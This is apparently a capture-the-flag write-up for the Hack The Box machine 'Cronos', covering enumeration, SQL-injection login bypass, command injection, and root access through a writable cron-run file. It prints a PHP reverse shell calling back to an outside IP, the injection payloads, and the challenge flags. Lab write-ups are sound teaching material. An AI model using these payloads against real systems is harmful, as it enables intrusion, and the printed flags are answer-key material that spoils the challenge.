CRONOS 10.10.10.13 Write Up
Machine Created by ch4p
Tools Used for Enumeration:
1. nmap2. nslookup
3. dig
Tools Used for Exploitation:
1. netcatSteps for primary enumeration:
1. At first we use nmap (Network Mapping tool) to scan the box ip. When we run it we got list of some open ports and services running on those ports. On the cronos box we can see, open port and service are, port port 22 for ssh, port 53 for nameserver and port 80 for apache 2.4.18 http server.Command used: nmap -A 10.10.10.8
2. Port 80 shows a default apache page. After some test, I thought about port 53 for nameserver so I tried nslookup. Got a domain name using commands nslookup.
3. After using dig we got some subdomains. Command used: dig axfr @10.10.10.13 cronos.htb
4. Point all domains to 10.10.10.13 using /etc/hosts. Now opening admin.cronos.htb shows a login page.
Steps to get user.txt:
1. Now simple sqli payload "admin' #" in the username lead to login bypass. Now we have tool to traceroute and ping.
2. Simple payload "hackproof.tech;whoami" shows that it is vulnerable to command injection.
Steps to get root.txt:
1. Based on machine name I checked cronjob first with "cat /etc/crontab" command and it shows "/var/www/laravel/artisan" is vulnerable. So I inserted a php reverse shell command in it to get a shell in another netcat.Shell code used: <?php $sock=fsockopen('10.10.14.3', 31337);exec('/bin/bash -i <&3 >&3 2>&3'); ?>
Command used to write shell: echo "<?php \$sock=fsockopen(\"10.10.14.3\",31337);exec(\"/bin/bash -i <&3 >&3 2>&3\"); ?>" > /var/www/laravel/artisan
2. Now go to root folder and get the root.txt. Command used: "cat /root/root.txt"
Flags:
1. user.txt flag: 51d236438b333970dbba7dc3089be33b2. root.txt flag: 1703b8a3c9a8dde879942c79d02fd3a0
Why the hell you're pasting the full content fo the flags? Ridicolous.
ReplyDelete